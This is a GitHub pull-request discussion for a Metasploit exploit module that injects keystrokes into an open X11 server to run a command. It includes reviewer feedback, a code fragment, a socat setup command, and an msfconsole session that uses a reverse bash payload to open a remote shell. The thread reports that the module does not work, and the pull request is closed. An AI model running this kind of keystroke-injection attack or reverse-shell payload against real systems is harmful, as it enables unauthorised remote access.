New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
X11 Keyboard Exec #5692
X11 Keyboard Exec #5692
Conversation
Maybe rename to X11 Keyboard Command Injection? |
@hmoore-r7 Sounds fine to me! Let me know if you want me to change it, although I won't have time until next week for this. |
release_key(KB_KEYS["f2"]) | ||
|
||
# Wait a second to open the dialog | ||
select(nil, nil, nil, 1) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
One second may be too slow for a host where the X services have been moved to (slow) swap. Making this configurable would be helpful.
@xistence Ping on this one as well, it seems pretty close to mergeable. |
@hmoore-r7 I've added a TIME_WAIT option to wait for the GUI. The default is 5 seconds. |
Thanks! |
@xistence I haven't been able to get this to work; even on an open X11 display, all I get back is an error for each keypress. I have tried Kali 1.0 and Ubuntu 14.04. A wireshark of the traffic just shows mangled X11 replies. |
It looks like the wire protocol is not correct; it doesn't match XSendEvent or XTEST in terms of format. I would suggest fixing this module to use XSendEvent (more widely compatible). I will PR some style/API changes back to your PR. |
Style/API PR is at https://github.com/xistence/metasploit-framework/pull/5 |
@xistence I am going to close this for now, but we can reopen if you get time to work on this. Thanks! |
This module connects to an open X11 server and registers as a virtual keyboard. After this keystrokes are sent to "type" and execute a payload.
How to reproduce the easiest way (Tested on Kali linux):
On Kali run the following command to make the X11 socket available on all interfaces on port 6000:
socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0
Make sure you are logged in on the X11 GUI of Kali.
Run the exploit (For extra fun watch the commands getting typed in the Linux X11 GUI:))
msf > use exploit/unix/x11/x11_keyboard_exec
msf exploit(x11_keyboard_exec) > set RHOST 192.168.2.130
RHOST => 192.168.2.130
msf exploit(x11_keyboard_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(x11_keyboard_exec) > exploit
[] Started reverse handler on 192.168.2.130:4444
[] 192.168.2.130:6000 - Register keyboard
[] 192.168.2.130:6000 - Opening "Run Application"
[] 192.168.2.130:6000 - Opening xterm
[] 192.168.2.130:6000 - Typing and executing payload
[] Command shell session 78 opened (192.168.2.130:4444 -> 192.168.2.130:51523) at 2015-07-10 13:50:35 +0700